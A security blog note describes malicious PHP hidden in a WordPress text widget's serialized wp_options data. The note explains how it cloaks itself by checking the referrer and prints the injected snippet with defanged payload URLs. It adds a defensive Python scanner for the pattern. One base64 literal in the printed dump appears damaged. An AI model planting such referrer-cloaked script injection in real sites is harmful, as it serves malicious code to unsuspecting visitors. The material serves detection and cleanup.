Malicious JavaScript Injected in Plugin Widget

Labs Note

Each and every day the attackers get more clever and exploit new attack vectors. Sucuri Labs recently found a malicious JavaScript hidden in the database of a WordPress website.

The malicious code was injected into a legitimate text widget of the website, stored as serialized data in the wp_options table:

s:6:"filter";b:1;}i:6;a:3:{s:5:"title";s:0:"";s:4:"text";s:515:"<?php$r=$_SERVER[base64_decode('SFRUUF9SRUZFUkVS')]; $h=$_SERVER[base64_decode('U0VSVkVSX05BTUU=')]; $s=base64_decode('PHNjcmlwdCBzcmM9Imh0dHAclVmIj48L3ND4NCg=='); $p = strpos($r, $h); if(($p===false)&&($r<>'')){echo $s;}if(current_user_can('administrator') || current_user_can('editor') || current_user_can('author') || current_user_can('contributor')) {?>

No heavy encoding or obfuscation was used in this attack, just plain base64 encoding. The injected PHP reads HTTP_REFERER and SERVER_NAME from $_SERVER, and only when the request carries a referrer that does not contain the site's own hostname (that is, a visitor arriving from elsewhere, such as a search engine) does it echo the decoded script tag. After decoding the strings, we found that it loads a malicious jQuery-lookalike JavaScript file from a shortened URL:

<script src="hxxp://g00(.)co/P4YrUf"></script>

That shortened URL redirects to this free JavaScript hosting website:

hxxp://yourjavascript(.)com/5123133466/jquery-migrate-min-g4.js

and the script it serves injects spammy iframes into the page where the widget is rendered.

If you think that you are a victim of such an attack, search your database for the base64-encoded strings shown above, update all of your plugins, and review all of your widgets for suspicious content. You can trust our Security Engineers at https://sucuri.net to check your website for more malicious code if you are unsure that the infection was cleared.
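The following scanner is an added example written for this note; it is not Sucuri's tooling and not code from the infected site. It implements the check recommended above for the pattern described earlier: it pulls each text widget body out of a serialized wp_options blob using the byte lengths PHP's serialize() writes, decodes every base64_decode() literal it finds, flags PHP and $_SERVER usage inside a text widget (which should only ever contain HTML), and reports when the decoded literals together reproduce the referrer check plus script echo. The sample blob, the example.invalid script URL and the deliberately truncated third literal are constructed for the demonstration; the two $_SERVER key literals are the ones from the dump above.

```python
import base64
import binascii
import re

# Matches base64_decode('...') or base64_decode("...") with a literal argument.
B64_CALL = re.compile(r"""base64_decode\(\s*['"]([A-Za-z0-9+/=]+)['"]\s*\)""")

# Decoded values that, together, make up the referrer-cloaked script injection.
INDICATORS = ("HTTP_REFERER", "SERVER_NAME", "<script", "<iframe")

# Raw red flags for a WordPress text widget, which should never contain PHP.
RAW_FLAGS = ("<?php", "<?=", "$_SERVER[", "current_user_can(")


def extract_text_widgets(serialized: bytes):
    """Pull every 'text' field out of a serialized widget_text option blob.

    PHP serialize() writes strings as s:<byte length>:"<bytes>"; honouring the
    declared length avoids being fooled by quotes or semicolons inside the value.
    """
    out = []
    for m in re.finditer(rb's:4:"text";s:(\d+):"', serialized):
        n = int(m.group(1))
        out.append(serialized[m.end(): m.end() + n].decode("utf-8", "replace"))
    return out


def decode_literal(enc: str):
    """Strict base64 decode; returns None on alphabet or padding errors."""
    try:
        return base64.b64decode(enc, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def scan_widget_text(text: str):
    """Return a list of (kind, encoded, decoded) findings for one widget body."""
    findings = []
    for flag in RAW_FLAGS:
        if flag in text:
            findings.append(("raw_flag", flag, None))
    for m in B64_CALL.finditer(text):
        enc = m.group(1)
        dec = decode_literal(enc)
        if dec is None:
            # Truncated or damaged literal: report it instead of aborting the scan.
            findings.append(("undecodable_base64", enc, None))
        elif any(ind.lower() in dec.lower() for ind in INDICATORS):
            findings.append(("suspicious_decoded", enc, dec))
        else:
            findings.append(("base64_literal", enc, dec))
    return findings


def looks_like_referrer_cloak(findings):
    """True when decoded literals reproduce the referrer-check + script-echo pattern."""
    decoded = {d for kind, _, d in findings if kind == "suspicious_decoded" and d}
    has_ref = any("HTTP_REFERER" in d for d in decoded)
    has_host = any("SERVER_NAME" in d for d in decoded)
    has_tag = any("<script" in d.lower() or "<iframe" in d.lower() for d in decoded)
    return has_ref and has_host and has_tag


def scan_option(serialized: bytes):
    """Scan every text widget in the blob; returns {widget index: findings} for hits."""
    report = {}
    for i, body in enumerate(extract_text_widgets(serialized)):
        findings = scan_widget_text(body)
        if findings:
            report[i] = findings
    return report


# Constructed sample modelled on the dump in this note. The script URL is a
# placeholder (example.invalid); the fourth literal is deliberately truncated
# to show that an undecodable string is reported rather than crashing the scan.
_TAG = base64.b64encode(b'<script src="http://example.invalid/x.js"></script>').decode()
_BODY = (
    "<?php $r=$_SERVER[base64_decode('SFRUUF9SRUZFUkVS')]; "
    "$h=$_SERVER[base64_decode('U0VSVkVSX05BTUU=')]; "
    f"$s=base64_decode('{_TAG}'); $x=base64_decode('PHNjcmlwdCBzcmM9Imh0dHA'); "
    "$p=strpos($r,$h); if(($p===false)&&($r<>'')){echo $s;} "
    "if(current_user_can('administrator')) {?>"
)
SAMPLE_OPTION = (
    b'a:2:{i:2;a:3:{s:5:"title";s:7:"Sidebar";s:4:"text";s:11:"Hello world";s:6:"filter";b:1;}'
    b'i:6;a:3:{s:5:"title";s:0:"";s:4:"text";s:' + str(len(_BODY.encode())).encode()
    + b':"' + _BODY.encode() + b'";s:6:"filter";b:1;}}'
)

if __name__ == "__main__":
    for idx, findings in scan_option(SAMPLE_OPTION).items():
        print(f"widget #{idx}: referrer-cloak pattern = {looks_like_referrer_cloak(findings)}")
        for kind, enc, dec in findings:
            print(f"  {kind}: {enc!r} -> {dec!r}")
```

To run it against a real site, dump the widget_text row (for example with `wp option get widget_text --format=json` or a direct SELECT on wp_options) and pass the raw bytes to scan_option(); the clean "Hello world" widget produces no findings, while the injected one is reported with each decoded literal so a reviewer can see the referrer check and script tag without decoding by hand.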
